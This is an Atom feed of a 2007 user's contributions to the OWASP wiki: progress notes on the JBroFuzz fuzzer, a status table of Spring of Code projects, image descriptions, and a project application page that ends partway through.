<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Subere</id>
		<title>OWASP - User contributions [en]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Subere"/>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php/Special:Contributions/Subere"/>
		<updated>2026-04-22T16:36:15Z</updated>
		<subtitle>User contributions</subtitle>
		<generator>MediaWiki 1.27.2</generator>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=SpoC_007_-_OWASP_JBroFuzz_Project_-_Progress_Page&amp;diff=21181</id>
		<title>SpoC 007 - OWASP JBroFuzz Project - Progress Page</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=SpoC_007_-_OWASP_JBroFuzz_Project_-_Progress_Page&amp;diff=21181"/>
				<updated>2007-08-28T12:56:43Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: New page: JBroFuzz has reached the 50% mark in terms of development for the SpoC 007.   Tested on mac osx, win32 and a few linux flavours. Current version is 0.7. Get it from the [http://www.sourcef...&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;JBroFuzz has reached the 50% mark in terms of development for the SpoC 007. &lt;br /&gt;
&lt;br /&gt;
Tested on mac osx, win32 and a few linux flavours. Current version is 0.7. Get it from the [http://www.sourceforge.net/projects/jbrofuzz Download Section].&lt;br /&gt;
&lt;br /&gt;
Below is a list of things completed:&lt;br /&gt;
&lt;br /&gt;
    * [Done] Open Source Tab&lt;br /&gt;
&lt;br /&gt;
Given a domain name, by submitting five google searches, JBroFuzz will yield back the corresponding email addresses available for that domain. This is really useful for enumerating or recovering valid username formats, etc.&lt;br /&gt;
&lt;br /&gt;
    * [Done] TCP Fuzzing tab allowing graph outputs&lt;br /&gt;
&lt;br /&gt;
Once fuzzing has been performed on any interface, a user can select the Bro button in order to get a normalised plot of the fuzzing responses obtained. This is really useful in terms of minimising time to analyse any results.&lt;br /&gt;
&lt;br /&gt;
    * [Done] TCP Sniffing tab update thread Agent Queue&lt;br /&gt;
&lt;br /&gt;
TCP Sniffing has become more robust. A complete re-write of how exceptions are handled has made the listener a lot more stable.&lt;br /&gt;
&lt;br /&gt;
    * [Done] Update Generators file format&lt;br /&gt;
&lt;br /&gt;
The file format has been updated to include a number of generators. This work ties in as a continuation towards using the XSSDB from GNU Citizen.&lt;br /&gt;
&lt;br /&gt;
The upcoming code in order to complete the code are as follows:&lt;br /&gt;
&lt;br /&gt;
    * Include all XSS Generators from GNU Citizen&lt;br /&gt;
    * New (pure) HTTP/S Fuzzing Tab using HTTPClient&lt;br /&gt;
    * Include SOAP and XML fuzzing &lt;br /&gt;
    * NTLM Brute Force over HTTP/S Tab&lt;br /&gt;
    * Blind SQL Injection Fuzzing Tab&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Spring_Of_Code_2007_-_Projects&amp;diff=20451</id>
		<title>OWASP Spring Of Code 2007 - Projects</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Spring_Of_Code_2007_-_Projects&amp;diff=20451"/>
				<updated>2007-07-29T17:49:22Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== All SpoC Projects ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; WIDTH=100%&lt;br /&gt;
|-&lt;br /&gt;
! SpoC Project Name&lt;br /&gt;
! Author&lt;br /&gt;
! Confirmed&lt;br /&gt;
! Status&lt;br /&gt;
! Coordinated by &lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - The OWASP Web Security Certification Framework|The OWASP Web Security Certification Framework]]&lt;br /&gt;
| Mark Curphey&lt;br /&gt;
| Yes&lt;br /&gt;
| 45% &lt;br /&gt;
| OWASP Board&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - SqlMap|SqlMap]]&lt;br /&gt;
| Bernardo Damele&lt;br /&gt;
| Yes&lt;br /&gt;
| 60% (to review)&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP Site Generator|OWASP Site Generator]]&lt;br /&gt;
| Boris&lt;br /&gt;
| Yes&lt;br /&gt;
| 0% &lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Attacks Reference Guide|Attacks Reference Guide]]&lt;br /&gt;
| NSRAV Security Research Group&lt;br /&gt;
| Yes&lt;br /&gt;
| 0% &lt;br /&gt;
| TBA&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - The Scholastic Application Security Assessment Project|The Scholastic Application Security Assessment Project]]&lt;br /&gt;
| Eric Sheridan and &lt;br /&gt;
Dr. Goran Trajkovski&lt;br /&gt;
| Yes&lt;br /&gt;
| 0% &lt;br /&gt;
| TBA&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Inspekt|Inspekt: Input filtering and validation library for PHP]]&lt;br /&gt;
| Ed Finkler&lt;br /&gt;
| Yes&lt;br /&gt;
| 50% (to review)&lt;br /&gt;
| Andrew v d Stock &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Code review Project|Code review Project]]&lt;br /&gt;
| Eoin Keary&lt;br /&gt;
| Yes&lt;br /&gt;
| 25% &lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP Certification Project|OWASP Certification Project]]&lt;br /&gt;
| Matteo Meucci&lt;br /&gt;
| Yes&lt;br /&gt;
| 0% &lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP Education Project|OWASP Education Project]]&lt;br /&gt;
| Sebastien Deleersnyder&lt;br /&gt;
| Yes&lt;br /&gt;
| 37,5% &lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP The Anti-Samy Project|OWASP The Anti-Samy Project]]&lt;br /&gt;
| Arshan Dabirsiaghi&lt;br /&gt;
| Yes&lt;br /&gt;
| 0% &lt;br /&gt;
| TBA&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Security throughout the SDLC|Security throughout the SDLC]]&lt;br /&gt;
| Keith Casey&lt;br /&gt;
| Yes&lt;br /&gt;
| 0% &lt;br /&gt;
| TBA&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP WebGoat Solutions Guide|OWASP WebGoat Solutions Guide]]&lt;br /&gt;
| Erwin Geirnaert&lt;br /&gt;
| Yes&lt;br /&gt;
| 90% &lt;br /&gt;
| Jeff Williams&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP WeBekci Project|OWASP WeBekci Project]]&lt;br /&gt;
| Bunyamin Demir&lt;br /&gt;
| Yes&lt;br /&gt;
| 0% &lt;br /&gt;
| Ivan Ristic &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Python Tainted Mode|Python Tainted Mode]]&lt;br /&gt;
| Denis&lt;br /&gt;
| Yes&lt;br /&gt;
| 0% &lt;br /&gt;
| TBA&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - WebScarab NG Security Test Automation|WebScarab NG Security Test Automation]]&lt;br /&gt;
| Darren Edmonds&lt;br /&gt;
| Yes&lt;br /&gt;
| 0% &lt;br /&gt;
| Jeff Williams&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Refresh Attacks list|Refresh Attacks list]]&lt;br /&gt;
| Przemyslaw 'rezos' Skowron&lt;br /&gt;
| Yes&lt;br /&gt;
| 0% &lt;br /&gt;
| TBA&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Best Practices &amp;amp; Countermeasures|Best Practices &amp;amp; Countermeasures]]&lt;br /&gt;
| Jim&lt;br /&gt;
| Yes&lt;br /&gt;
| 0% &lt;br /&gt;
| TBA&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP Brand|OWASP brand]]&lt;br /&gt;
| Paulo Coimbra&lt;br /&gt;
| Yes&lt;br /&gt;
| 0% &lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Web Application Security put into practice|Web Application Security put into practice]]&lt;br /&gt;
| Heiko Webers&lt;br /&gt;
| Yes&lt;br /&gt;
| 60% &lt;br /&gt;
| TBA&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP JBroFuzz Project|OWASP JBroFuzz Project]]&lt;br /&gt;
| Subere&lt;br /&gt;
| Yes&lt;br /&gt;
| 40% &lt;br /&gt;
| TBA&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Owasp Orizon Project|Owasp Orizon Project]]&lt;br /&gt;
| Paolo Perego&lt;br /&gt;
| Yes&lt;br /&gt;
| 45% &lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Enigform: Firefox Addon for OpenPGP signing of HTTP requests|Enigform: Firefox Addon for OpenPGP signing of HTTP requests]]&lt;br /&gt;
| Arturo (Buanzo) Busleiman&lt;br /&gt;
| Yes&lt;br /&gt;
| half term review: done &lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP LiveCD Education Project|OWASP LiveCD Education Project]]&lt;br /&gt;
| Josh Sweeney&lt;br /&gt;
| Yes&lt;br /&gt;
| 50% (to review) &lt;br /&gt;
| Eoin Keary&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP Java Project|OWASP Java Project]]&lt;br /&gt;
| Erwin Geirnaert&lt;br /&gt;
| Yes&lt;br /&gt;
| 0% &lt;br /&gt;
| Jeff Williams&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP LiveCD Project|OWASP LiveCD Project]]&lt;br /&gt;
| Joshua Perrymon&lt;br /&gt;
| Yes&lt;br /&gt;
| 0% &lt;br /&gt;
| Eoin Keary&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Interim @ Aspect Offices|Interim @ Aspect Offices]]&lt;br /&gt;
| Andy Gocke&lt;br /&gt;
| Yes&lt;br /&gt;
| 0% &lt;br /&gt;
| Jeff Williams&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - 10x 1000USD to FOSS projects we all use |10x 1000USD to FOSS projects we all use ]]&lt;br /&gt;
| (tbd)&lt;br /&gt;
| No&lt;br /&gt;
| 0% &lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Help with SpoC project management|Help with SpoC project management]]&lt;br /&gt;
| Paulo Coimbra&lt;br /&gt;
| Yes&lt;br /&gt;
| 0% &lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Jbrofuzz-results.png&amp;diff=20374</id>
		<title>File:Jbrofuzz-results.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Jbrofuzz-results.png&amp;diff=20374"/>
				<updated>2007-07-29T05:00:50Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: An image screenshot of results while performing a Man-In-The-Middle eavesdropping session using the &amp;quot;TCP Sniffing&amp;quot; tab. JBroFuzz can be used as a TCP Proxy Fuzzer when the results from the &amp;quot;TCP Sniffing&amp;quot; tab are placed in the &amp;quot;TCP Fuzzing&amp;quot; tab.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;An image screenshot of results while performing a Man-In-The-Middle eavesdropping session using the &amp;quot;TCP Sniffing&amp;quot; tab. JBroFuzz can be used as a TCP Proxy Fuzzer when the results from the &amp;quot;TCP Sniffing&amp;quot; tab are placed in the &amp;quot;TCP Fuzzing&amp;quot; tab.&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:JBroFuzz-Image.png&amp;diff=20368</id>
		<title>File:JBroFuzz-Image.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:JBroFuzz-Image.png&amp;diff=20368"/>
				<updated>2007-07-29T04:29:11Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: A screenshot image of JBroFuzz to be placed on the website.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;A screenshot image of JBroFuzz to be placed on the website.&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:JBroFuzz-splash.jpg&amp;diff=20366</id>
		<title>File:JBroFuzz-splash.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:JBroFuzz-splash.jpg&amp;diff=20366"/>
				<updated>2007-07-29T03:58:26Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Jbrofuzz-splash.jpg&amp;diff=20365</id>
		<title>File:Jbrofuzz-splash.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Jbrofuzz-splash.jpg&amp;diff=20365"/>
				<updated>2007-07-29T03:54:29Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: The splash screen for JBroFuzz, seen on the website's main page.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;The splash screen for JBroFuzz, seen on the website's main page.&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Splash.jpg&amp;diff=20364</id>
		<title>File:Splash.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Splash.jpg&amp;diff=20364"/>
				<updated>2007-07-29T03:52:41Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Spring_Of_Code_2007_Applications&amp;diff=17349</id>
		<title>OWASP Spring Of Code 2007 Applications</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Spring_Of_Code_2007_Applications&amp;diff=17349"/>
				<updated>2007-03-20T11:36:54Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: /* Why should JBroFuzz should be sponsored? */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page contains project Applications to the [[OWASP_Spring_Of_Code_2007]]&lt;br /&gt;
&lt;br /&gt;
'''If you want to apply for a SpoC 007 sponsorship you HAVE TO USE THIS PAGE for your application'''&lt;br /&gt;
&lt;br /&gt;
See [[OWASP_Spring_Of_Code_2007#How_To_Participate]] for what do to one you completed your Application&lt;br /&gt;
&lt;br /&gt;
---------&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Proposed template:''' {for longer proposals, in addition to these details you can create a PDF}:&lt;br /&gt;
&lt;br /&gt;
== {Your first name or Alias} - {Project name} ==&lt;br /&gt;
Please remember that projects will be selected and funded based on how well they meet the [[OWASP_Spring_Of_Code_2007_:_Selection|Selection Criteria]].&lt;br /&gt;
&lt;br /&gt;
You can propose your project in any form you wish, but the best proposals will be well thought out, clear and concise, and reflective of your passion for the topic.  We strongly suggest that you include the following information in your proposal.&lt;br /&gt;
&lt;br /&gt;
* Your educational and professional background&lt;br /&gt;
&lt;br /&gt;
* Application security experience and accomplishments&lt;br /&gt;
&lt;br /&gt;
* Participation and leadership in open communities&lt;br /&gt;
&lt;br /&gt;
* The opportunity, challenges, issues or need your proposal addresses&lt;br /&gt;
&lt;br /&gt;
* Objectives or ways in which you will meet the goal(s)&lt;br /&gt;
&lt;br /&gt;
* Specific activities and who will carry out these activities&lt;br /&gt;
&lt;br /&gt;
* Specific deliverables and a rough project schedule so we can track progress&lt;br /&gt;
&lt;br /&gt;
* Long-term vision for the project&lt;br /&gt;
&lt;br /&gt;
* Any other reasons why you and your project should be selected&lt;br /&gt;
&lt;br /&gt;
== Buanzo - Enigform: Firefox Addon for OpenPGP signing of HTTP requests ==&lt;br /&gt;
&lt;br /&gt;
I am a 25 year old Independent security consultant from Buenos Aires, Argentina, that has contributed to the world of&lt;br /&gt;
information systems security since 1994, when BBSes and Linux still lived together.&lt;br /&gt;
&lt;br /&gt;
I quick search for buanzo on google [http://www.google.com/search?hl=en&amp;amp;q=buanzo&amp;amp;btnG=Google+Search] will provide all necessary details about my professional and community background. For comprobable experience, you could also check my Rent a Coder profile.[http://www.rentacoder.com/RentACoder/SoftwareCoders/showBioInfo.asp?lngAuthorId=735204].&lt;br /&gt;
&lt;br /&gt;
In my free time I like playing with my Punk-Pop band [http://www.purevolume.com/futurabandapunkpop], Futurabanda. [http://www.futurabanda.com.ar], and maintaining my Restaurants, Wines and Recipes site. [http://www.vivamoslavida.com.ar]. I have to admit that my first priorities are my beloved son [http://www.fotolog.com/buanzo] and my wonderful wife [http://www.fotolog.com/buanzo].&lt;br /&gt;
&lt;br /&gt;
=== Accomplishments ===&lt;br /&gt;
&lt;br /&gt;
I've contributed scripts, fixes and translations to the Nmap project. I've also acted as Expert Contributor for SANS TOP-20 2004, 2005 and 2006. I've developed &lt;br /&gt;
lots that can be found in Freshmeat, like mprl (a getty enhancement to allow remote logins from the login: prompt of the console). I've also written&lt;br /&gt;
the Unix chapter of the OISSG's Information Systems Security Assessment Framework, v0.1 [http://www.oissg.org/content/view/71/71/]. I'm currently writing&lt;br /&gt;
an Internet Draft to be proposed for RFC regarding Enigform.&lt;br /&gt;
&lt;br /&gt;
=== Community ===&lt;br /&gt;
&lt;br /&gt;
I run the official 2600 meetings site for Argentina [http://www.2600.com/meetings/pages.html], I've been proposed, but I refused, for President of the Argentinian Free Software group called SOLAR [www.solar.org.ar]. I'm an active member of the FLOSS community since 1996, having written articles in magazines http://www.net-security.org/dl/articles/Detecting_and_Understanding_rootkits.txt, made TV, radio&lt;br /&gt;
and newspaper appearances [http://codigoabierto.bitacoras.com/archivos/2005/04/01/buanzo-hacks] and led different security research groups of Spain, Mexico and Argentina. Currently I contribute time thorugh my sites, forums and blogs,&lt;br /&gt;
answering questions in mailing lists and helping coordinate some local LUGs. I do also manager the Linux Counter for Argentina [http://counter.li.org/reports/place.php?place=AR].&lt;br /&gt;
&lt;br /&gt;
=== My Project ===&lt;br /&gt;
&lt;br /&gt;
Enigform [http://enigform.mozdev.org] is a Firefox extension that enhances HTTP with OpenPGP functionality. It digitally signs outgoing HTTP requests so that a web server can authenticate&lt;br /&gt;
the identity and data of the incoming request. It is a Web Security tool because it can, if correctly implemented as any OpenPGP based technology, render man in&lt;br /&gt;
the middle attacks useless. I think OpenPGP already speaks for itself regarding eMail. Imagine the same benefits for http and web applications.&lt;br /&gt;
&lt;br /&gt;
Enigform is the reference implementation of the Internet Draft I'm working on, in discussion with members of the IETF's OpenPGP Working Group.&lt;br /&gt;
&lt;br /&gt;
Some simple PHP code is enough to make a web application Enigform-aware [http://enigformtest.buanzo.com.ar]. The Smutty PHP MVC Framework already supports Enigform [http://smutty.pu-gh.com/demo/enigform].&lt;br /&gt;
&lt;br /&gt;
=== Long Term ===&lt;br /&gt;
&lt;br /&gt;
Have the Draft be proposed as a Standards Track RFC document, have Enigform support directly in Apache and IIS, and port Enigform to other browsers&lt;br /&gt;
and/or programming languages, and also provide OpenPGP De/Encryption support.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Why should I be selected ===&lt;br /&gt;
&lt;br /&gt;
I have the experience, security awareness and means to make this project THE web security project of the decade. I am a respected member of the&lt;br /&gt;
international security community, and I firmly believe Enigform is my greatest idea so far.&lt;br /&gt;
&lt;br /&gt;
== Eoin Keary - Code review Project ==&lt;br /&gt;
* '''Executive Summary''':&lt;br /&gt;
I am proposing that I complete the OWASP Code review guide during this period.&lt;br /&gt;
The code review guide was started by me in 2005 and has much information on reviewing code for common vulnerabilities. It is frequently accessed (looking at the stats on the OWASP site) and therefore is useful to practitioners. &lt;br /&gt;
&lt;br /&gt;
I believe the code review guide is an integral part of the OWASP BOK (Body of Knowledge). Ensuring secure development is key to secure applications and code review is of paramount importance in this domain.&lt;br /&gt;
&lt;br /&gt;
There are many sections still to be added and more to be readjusted and rewritten to reflect the current state of the security world.&lt;br /&gt;
Much needs to be written on Web 2.0 technologies and distributed B2B technologies such as Webservices.&lt;br /&gt;
 &lt;br /&gt;
The Code review process and procedure needs also to be covered. A guide to establishing a mature code review process also needs to be done.&lt;br /&gt;
Code review methodologies also need to be discussed.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''Objectives and Deliverables''':&lt;br /&gt;
&lt;br /&gt;
Update of the code review guide:&lt;br /&gt;
* Add additional areas relating to the code review process such as:&lt;br /&gt;
** Benefits and pitfalls&lt;br /&gt;
** Methodology&lt;br /&gt;
** The code review process&lt;br /&gt;
*** Transactional analysis&lt;br /&gt;
*** Managing the code review process&lt;br /&gt;
*** Assigning risk to findings&lt;br /&gt;
&lt;br /&gt;
** Technical guides&lt;br /&gt;
*** Language specific best practice &lt;br /&gt;
*** Java &lt;br /&gt;
*** .NET &lt;br /&gt;
*** PHP &lt;br /&gt;
*** MySQL &lt;br /&gt;
*** Stored Procs &lt;br /&gt;
*** C/C++ &lt;br /&gt;
&lt;br /&gt;
** Code review by vulnerability:&lt;br /&gt;
*** Reviewing Code for Buffer Overruns and Overflows &lt;br /&gt;
*** Reviewing Code for OS Injection&lt;br /&gt;
*** Reviewing Code for SQL Injection&lt;br /&gt;
*** Reviewing Code for Data Validation&lt;br /&gt;
*** Reviewing code for XSS issues&lt;br /&gt;
*** Reviewing Code for Error Handling&lt;br /&gt;
*** Reviewing Code for Logging Issues&lt;br /&gt;
*** Reviewing The Secure Code Environment&lt;br /&gt;
*** Reviewing code for Authorization Issues&lt;br /&gt;
*** Reviewing code for Authentication Issues&lt;br /&gt;
*** Reviewing code for Session Integrity&lt;br /&gt;
*** Reviewing code for Cross Site Request Forgery&lt;br /&gt;
*** Reviewing code for Cryptography implementation issues&lt;br /&gt;
*** Reviewing code Dangerous HTTP Methods (Deployment)&lt;br /&gt;
*** Race Conditions &lt;br /&gt;
&lt;br /&gt;
The areas of code are structured giving a brief explanation, the anti-pattern (vulnerable pattern to look for) and a suggested fix.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''Why I should be sponsored for the project''':&lt;br /&gt;
&lt;br /&gt;
I used to head up the code review team as part of the application security group in fidelity investments and have 5+ years of the secure code review process. &lt;br /&gt;
I also was the lead of the Testing guide until V2 was published via the Autumn of Code. &lt;br /&gt;
&lt;br /&gt;
I have always  delivered any work I have volunteered for on time. &lt;br /&gt;
 &lt;br /&gt;
I have been involved in OWASP projects for 2/3 years now and have always been an active contributor.&lt;br /&gt;
&lt;br /&gt;
== Paolo Perego - Owasp Orizon Project ==&lt;br /&gt;
* '''Executive Summary''':&lt;br /&gt;
Owasp Orizon [http://www.owasp.org/index.php/Category:OWASP_Orizon_Project] Project born in 2006 as answer to the lack of common engine and library usable by opensource code review related tools.&lt;br /&gt;
&lt;br /&gt;
I'm proposing that, during the Spring of Code 2007 period, I'll complete static analisys API and java source code enforment objects.&lt;br /&gt;
&lt;br /&gt;
Sometimes a complete code review approach is not suitable for most customers who wants to harden their code which is being approaching release stage. For such a reason, I started writing Java objects that embeds most of the security checks against common web vulnerabilities (XSS, SQL injection, Session handling, ...) so that source code can be hardened with a small effort in terms of code rewriting.&lt;br /&gt;
&lt;br /&gt;
I do believe that a common set of API and a common safe coding best practices library is one of the most important goals to bring application security to the developers.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''Objectives and Deliverables''':&lt;br /&gt;
Completing the static code review API section&lt;br /&gt;
* improving programming language to XML translator&lt;br /&gt;
* improving security best practices code review scan library&lt;br /&gt;
* improving secure coding fashion best practices library&lt;br /&gt;
* writing the pattern matching scan using the aformentioned libraries&lt;br /&gt;
Writing the java source code enforment objects&lt;br /&gt;
* writing an object to handle form data values to avoid XSS&lt;br /&gt;
* writing an object to handle form data values to avoid SQL Injection&lt;br /&gt;
* writing an object to handle HttpRequest and HttpSession objects&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''Why I should be sponsored for the project''':&lt;br /&gt;
Owasp Orizon is the first Owasp project I'm involved in. I'm also contributor of Owasp Italian chapter managed by Matteo Meucci and I'm talking at various speeches about application security and safe coding best practices.&lt;br /&gt;
&lt;br /&gt;
I'm a security consultant working in ethical hacking and we're approaching code review and safe topics right now.&lt;br /&gt;
I'm a developer too so I understand also the &amp;quot;dark side&amp;quot; of the problem developing code with security in mind.&lt;br /&gt;
&lt;br /&gt;
I work using the &amp;quot;release early release often&amp;quot; paradigm so to be concrete and let other people having something usable to work with.&lt;br /&gt;
&lt;br /&gt;
== Sebastien Deleersnyder - OWASP Education Project ==&lt;br /&gt;
* '''Executive Summary''':&lt;br /&gt;
This Education project aims to provide in building blocks of web application security information. These modules can be combined together in education tracks targeting different audiences. &lt;br /&gt;
&lt;br /&gt;
Web Application Security Education and Awareness is needed throughout the entire organization, each area and level of organizations have specific needs and requirements regarding education. A manager needs other information than a security professional or developer. Novices to the profession require other training than people with several years of experience. &lt;br /&gt;
&lt;br /&gt;
* '''Objectives and Deliverables''':&lt;br /&gt;
Currently the project goals are to create Educational Tracks: &lt;br /&gt;
* Complete the [[OWASP Education Presentation|consolidation page of OWASP presentations]] performed in the past&lt;br /&gt;
* A &amp;quot;Web Application Security Primer&amp;quot; Track for beginners (4 hours) &lt;br /&gt;
* A &amp;quot;What developers should know on Web Application Security&amp;quot; Track for developers (4 hours) &lt;br /&gt;
&lt;br /&gt;
* '''Why you should be sponsored for the project''': &lt;br /&gt;
I started the successful Belgian Chapter 3 years ago and have actively contributed to OWASP since then. I also co-organized the European conference last year in Belgium.&lt;br /&gt;
&lt;br /&gt;
This is the first separate project that I started, originating from a local demand to set up educational tracks for people that are new to Web Application Security. There are literally hundreds of presentations and an enormous amount of information on the OWASP web site. The goal of this project is to restructure pieces of that information in reusable modules that can be combined in educational tracks. It is my believe that awareness is an important cornerstone of building secure web applications, and this project will actively support that.&lt;br /&gt;
&lt;br /&gt;
If we are granted Spoc 007 participation, I will be sharing the budget with all active participants. This will be an extra motivation for project participation. I will reinvest my part in the project to set up a web conferencing / web casting solution to be used to disseminate the project results and make them available for later use.&lt;br /&gt;
&lt;br /&gt;
* '''More details''': &lt;br /&gt;
The detailed [[OWASP Education Project Roadmap|road map]] can be found here.&lt;br /&gt;
The SpoC 007 goal is to finish Sub Goals 1, 2, 3 and 4. If time permits we can start with sub goal 5.&lt;br /&gt;
&lt;br /&gt;
== Subere - OWASP JBroFuzz Project ==&lt;br /&gt;
&lt;br /&gt;
==== Overview ==== &lt;br /&gt;
&lt;br /&gt;
JBroFuzz is a stateless network protocol fuzzer that emerged from the needs of penetration testing. The purpose of this application is to provide a single, portable application that offers stable cross-platform network protocol fuzzing capabilities. At the same time, JBroFuzz attempts to keep the User Interface (UI) as intuitive as possible.&lt;br /&gt;
&lt;br /&gt;
==== Fuzzing ==== &lt;br /&gt;
&lt;br /&gt;
As seen by the emphasis given on the subject of fuzzing in the 2007 Testing Guide (v2), network protocol fuzzing serves as a fundamental cornerstone of application security testing. For this, many different categories and types of fuzzing have been defined.&lt;br /&gt;
&lt;br /&gt;
==== Objectives ==== &lt;br /&gt;
&lt;br /&gt;
JBroFuzz needs to expand and grow in order to cover network fuzzing in a more complete manner. Its modular implementation allows for the addtion of new functionality by means of independent tabs. The key tabs proposed to be added during the spring of code 2007 are (details in next section):&lt;br /&gt;
&lt;br /&gt;
* '''Open Source Tab'''&lt;br /&gt;
* '''NTLM Brute Force over HTTP/S Tab'''&lt;br /&gt;
* '''Pure HTTP/S Fuzzing using HTTPClient'''&lt;br /&gt;
* '''Blind SQL Injection Fuzzing Tab'''&lt;br /&gt;
&lt;br /&gt;
At the same time, the following existing tabs need to be updated and made more robust (details in next section):&lt;br /&gt;
&lt;br /&gt;
* '''TCP Fuzzing tab allowing graph outputs'''&lt;br /&gt;
* '''TCP Sniffing tab update thread Agent Queue'''&lt;br /&gt;
* '''Update Generators file format'''&lt;br /&gt;
* '''Include SOAP and XML fuzzing'''&lt;br /&gt;
&lt;br /&gt;
This expansion process relates to stabilising code that is presently included in JBroFuzz, thus allowing it to run for extensive periods of time (24h+) as well as adding more functionality in terms of the three new tabs.&lt;br /&gt;
&lt;br /&gt;
==== Deliverables ==== &lt;br /&gt;
